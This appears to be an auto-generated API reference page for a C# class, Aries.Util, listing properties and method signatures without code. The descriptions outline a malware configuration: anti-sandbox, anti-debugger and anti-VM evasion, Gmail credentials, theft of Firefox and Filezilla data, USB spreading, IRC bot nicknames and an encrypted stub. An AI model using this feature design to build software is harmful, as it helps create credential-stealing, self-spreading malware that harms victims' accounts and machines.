C# Class Aries.Util

Afficher le fichier Open project: EAXrec/Aries

Méthodes publiques

Свойство Type Description
AESClass SimpleAES
AntiSandbox bool
AntiSniffDebug bool
AntiSysinternals bool
AntiVirtual bool
CrashType int
DisplayErrorMsg bool
DisplayInVirtual bool
EncryptHost bool
ErrorBody string
ErrorTitle string
FSplit string
FSplit2 string
FSplit3 string
FSplit4 string
GmailPass string
GmailUser string
OriginalSize int
PackedSize int
ProtectNum string
SendFirefoxFilezilla bool
USBSpread bool
UseRandomNick bool
compressed bool
encryptionkey byte[]
file1TargetFileOutput string
msgIcon string
stub string

Méthodes publiques

Méthode Description
IsProcessRunning ( string file_name ) : bool

Check for a process name and window title

Reverse ( string x ) : string

Reverse a string

getRandNum ( int length ) : string

Return a string of random letters (removed numbers for more compatible use)

Private Methods

Méthode Description
GetModuleHandle ( string lpModuleName ) : IntPtr

Method Details

IsProcessRunning() public static méthode

Check for a process name and window title
public static IsProcessRunning ( string file_name ) : bool
file_name string Process or window title to check for
Résultat bool

Reverse() public static méthode

Reverse a string
public static Reverse ( string x ) : string
x string String to reverse
Résultat string

getRandNum() public static méthode

Return a string of random letters (removed numbers for more compatible use)
public static getRandNum ( int length ) : string
length int Length of random string to return
Résultat string

Property Details

AESClass public_oe static_oe property

public static SimpleAES AESClass
Résultat SimpleAES

AntiSandbox public_oe static_oe property

Anti Sandboxie
public static bool AntiSandbox
Résultat bool

AntiSniffDebug public_oe static_oe property

Anti Sniffers/Debuggers
public static bool AntiSniffDebug
Résultat bool

AntiSysinternals public_oe static_oe property

Anti Sysinternals products
public static bool AntiSysinternals
Résultat bool

AntiVirtual public_oe static_oe property

Anti Virtual Environment
public static bool AntiVirtual
Résultat bool

CrashType public_oe static_oe property

Numeric value for the way that the program will end itself
public static int CrashType
Résultat int

DisplayErrorMsg public_oe static_oe property

Anti Sandboxie
public static bool DisplayErrorMsg
Résultat bool

DisplayInVirtual public_oe static_oe property

Display the error msg if it's enabled and if running in a Virtual Environement
public static bool DisplayInVirtual
Résultat bool

EncryptHost public_oe static_oe property

Encrypt the host file?
public static bool EncryptHost
Résultat bool

ErrorBody public_oe static_oe property

Body of the error msg to display if enabled
public static string ErrorBody
Résultat string

ErrorTitle public_oe static_oe property

Title of the error msg to display if enabled
public static string ErrorTitle
Résultat string

FSplit public_oe static_oe property

public static string FSplit
Résultat string

FSplit2 public_oe static_oe property

public static string FSplit2
Résultat string

FSplit3 public_oe static_oe property

public static string FSplit3
Résultat string

FSplit4 public_oe static_oe property

public static string FSplit4
Résultat string

GmailPass public_oe static_oe property

Gmail Password
public static string GmailPass
Résultat string

GmailUser public_oe static_oe property

Gmail Username
public static string GmailUser
Résultat string

OriginalSize public_oe static_oe property

Original size of the target file
public static int OriginalSize
Résultat int

PackedSize public_oe static_oe property

public static int PackedSize
Résultat int

ProtectNum public_oe static_oe property

public static string ProtectNum
Résultat string

SendFirefoxFilezilla public_oe static_oe property

Send Firefox/Filezilla info after running 1st time
public static bool SendFirefoxFilezilla
Résultat bool

USBSpread public_oe static_oe property

Spread to USB drives after running 1st time
public static bool USBSpread
Résultat bool

UseRandomNick public_oe static_oe property

use a random irc nick
public static bool UseRandomNick
Résultat bool

compressed public_oe static_oe property

Compress the target file?
public static bool compressed
Résultat bool

encryptionkey public_oe static_oe property

Encryption key used for AES
public static byte[] encryptionkey
Résultat byte[]

file1TargetFileOutput public_oe static_oe property

The target file contents, stored in a string
public static string file1TargetFileOutput
Résultat string

msgIcon public_oe static_oe property

public static string msgIcon
Résultat string

stub public_oe static_oe property

string to store the stub in
public static string stub
Résultat string